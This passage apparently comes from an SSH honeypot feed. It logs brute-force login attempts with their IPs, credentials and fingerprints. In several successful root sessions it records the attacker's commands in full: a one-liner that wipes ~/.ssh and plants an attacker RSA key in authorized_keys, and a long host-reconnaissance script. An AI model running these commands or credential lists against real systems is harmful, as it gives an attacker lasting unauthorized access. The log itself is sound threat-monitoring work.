    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE",
    "COMMANDS RUN"
  ]
}

37.60.225.239

2026-06-30 07:21:45.918397 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sdm

Record ID: 0763b82f8847

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "0763b82f8847",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:21:45.918397Z",
  "end_time": "2026-06-30T07:21:47.915515Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "sdm",
      "pass": "sdm"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:21:36.327557 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: beacon

Record ID: 74b5ce0635a6

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "74b5ce0635a6",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:21:36.327557Z",
  "end_time": "2026-06-30T07:21:38.318664Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "beacon",
      "pass": "beacon123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

14.103.37.34

2026-06-30 07:20:15.289618 UTC

SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: cd92eb6df87e

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 1.5s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "cd92eb6df87e",
  "src_ip": "14.103.37.34",
  "start_time": "2026-06-30T07:20:15.289618Z",
  "end_time": "2026-06-30T07:20:16.757224Z",
  "duration": "1.5",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}

14.103.37.34

2026-06-30 07:20:12.592550 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: b3d81db4b905

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.5s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "b3d81db4b905",
  "src_ip": "14.103.37.34",
  "start_time": "2026-06-30T07:20:12.592550Z",
  "end_time": "2026-06-30T07:20:15.132229Z",
  "duration": "2.5",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

14.103.37.34

2026-06-30 07:20:09.104156 UTC

SUCCESSFUL LOGIN COMMANDS RUN SCORE: 80

Credential acceptance event recorded. Target authentication: root / qwe123asd

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh

Command not found: lockr -ia .ssh

[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Record ID: 25d5ba018c02

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 7.6s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "25d5ba018c02",
  "src_ip": "14.103.37.34",
  "start_time": "2026-06-30T07:20:09.104156Z",
  "end_time": "2026-06-30T07:20:16.754138Z",
  "duration": "7.6",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "qwe123asd"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "SUCCESSFUL LOGIN",
    "COMMANDS RUN"
  ]
}

220.127.148.6

2026-06-30 07:19:53.388949 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: violet

Record ID: fe1ab4c9c43f

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.1s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "fe1ab4c9c43f",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:19:53.388949Z",
  "end_time": "2026-06-30T07:19:55.445529Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "violet",
      "pass": "violet"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:19:09.266924 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: ganymede

Record ID: 76545b1bcc20

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "76545b1bcc20",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:19:09.266924Z",
  "end_time": "2026-06-30T07:19:11.261643Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "ganymede",
      "pass": "ganymede123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:18:03.261858 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: etest

Record ID: 0f954bc084da

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "0f954bc084da",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:18:03.261858Z",
  "end_time": "2026-06-30T07:18:05.240493Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "etest",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:16:27.294208 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: quake

Record ID: 24ffdc472293

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "24ffdc472293",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:16:27.294208Z",
  "end_time": "2026-06-30T07:16:29.287494Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "quake",
      "pass": "quake"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:16:11.082423 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: spam

Record ID: a54239a0a682

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "a54239a0a682",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:16:11.082423Z",
  "end_time": "2026-06-30T07:16:13.095126Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "spam",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:14:20.867018 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: insomnia

Record ID: b13f2533755a

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "b13f2533755a",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:14:20.867018Z",
  "end_time": "2026-06-30T07:14:22.856930Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "insomnia",
      "pass": "insomnia"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:13:51.000358 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: prod

Record ID: 5ecae8547914

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "5ecae8547914",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:13:51.000358Z",
  "end_time": "2026-06-30T07:13:52.961130Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "prod",
      "pass": "prod"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:12:36.951427 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: responsive

Record ID: 6bd8741b241a

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "6bd8741b241a",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:12:36.951427Z",
  "end_time": "2026-06-30T07:12:38.908485Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "responsive",
      "pass": "responsive123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

41.82.50.218

2026-06-30 07:12:02.305781 UTC

SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: ac72cf70fdcb

Client Version: SSH-2.0-libssh_0.11.1

Engagement Duration: 1.4s

HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb

{
  "id": "ac72cf70fdcb",
  "src_ip": "41.82.50.218",
  "start_time": "2026-06-30T07:12:02.305781Z",
  "end_time": "2026-06-30T07:12:03.662094Z",
  "duration": "1.4",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}

41.82.50.218

2026-06-30 07:11:59.777931 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 96c8132bbbd7

Client Version: SSH-2.0-libssh_0.11.1

Engagement Duration: 2.3s

HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb

{
  "id": "96c8132bbbd7",
  "src_ip": "41.82.50.218",
  "start_time": "2026-06-30T07:11:59.777931Z",
  "end_time": "2026-06-30T07:12:02.096482Z",
  "duration": "2.3",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

41.82.50.218

2026-06-30 07:11:57.065506 UTC

SUCCESSFUL LOGIN COMMANDS RUN SCORE: 80

Credential acceptance event recorded. Target authentication: root / Admin999

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh

Command not found: lockr -ia .ssh

[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Record ID: b0d5b6eb3b0d

Client Version: SSH-2.0-libssh_0.11.1

Engagement Duration: 6.6s

HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb

{
  "id": "b0d5b6eb3b0d",
  "src_ip": "41.82.50.218",
  "start_time": "2026-06-30T07:11:57.065506Z",
  "end_time": "2026-06-30T07:12:03.658241Z",
  "duration": "6.6",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Admin999"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "SUCCESSFUL LOGIN",
    "COMMANDS RUN"
  ]
}

37.60.225.239

2026-06-30 07:11:22.028447 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: universe

Record ID: 6ca736882838

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "6ca736882838",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:11:22.028447Z",
  "end_time": "2026-06-30T07:11:24.053236Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "universe",
      "pass": "universe"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:10:51.561956 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: pos

Record ID: 79c2eca5656b

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "79c2eca5656b",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:10:51.561956Z",
  "end_time": "2026-06-30T07:10:53.514013Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "pos",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

2.57.122.150

2026-06-30 07:09:58.570268 UTC

SUCCESSFUL LOGIN RECONNAISSANCE COMMANDS RUN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 123456

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 